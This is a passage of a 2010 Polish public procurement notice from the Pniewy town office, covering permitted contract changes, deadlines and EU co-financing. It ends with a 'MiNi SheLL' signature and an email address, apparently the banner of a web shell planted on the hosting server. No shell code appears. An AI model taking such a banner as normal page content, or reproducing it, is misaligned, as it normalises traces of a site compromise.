i uprawnieniami, o których mowa w ustawie Prawo budowlane oraz, które wymagane były przez Zamawiającego w ogłoszeniu i SIWZ.
3.Zmiany podwykonawców:
a.rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego 
w ofercie Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SIWZ,
b.zmiana podmiotu, który uczestniczy w realizacji części zamówienia jako podwykonawca, na którego potencjale opierał się Wykonawca składając ofertę, będzie możliwa, ale jedynie pod warunkiem, że nowy podmiot wykaże spełnienie warunków udziału w postępowaniu, które wymagane były przez Zamawiającego w ogłoszeniu i SIWZ, 
5.Pozostałe zmiany: 
a.zmiana obowiązującej stawki VAT. Jeśli zmiana stawki VAT będzie powodować zmianę wysokości wynagrodzenia jakie ma otrzymać Wykonawca, 
6. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Powyższe zmiany do umowy winny być wprowadzone poprzez zmianę do kontraktu - aneks. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pniewy.wlkp.pl/?c=742<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pniewach, ul. Dworcowa 37, 62-045 Pniewy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2010 godzina 09:30, miejsce: Urząd Miejski w Pniewach, ul. Dworcowa 37, 62-045 Pniewy, parter- biuro obsługi interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany ze środków Unii Europejskieje w ramach Programu Rozwoju Obszarów Wiejkich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com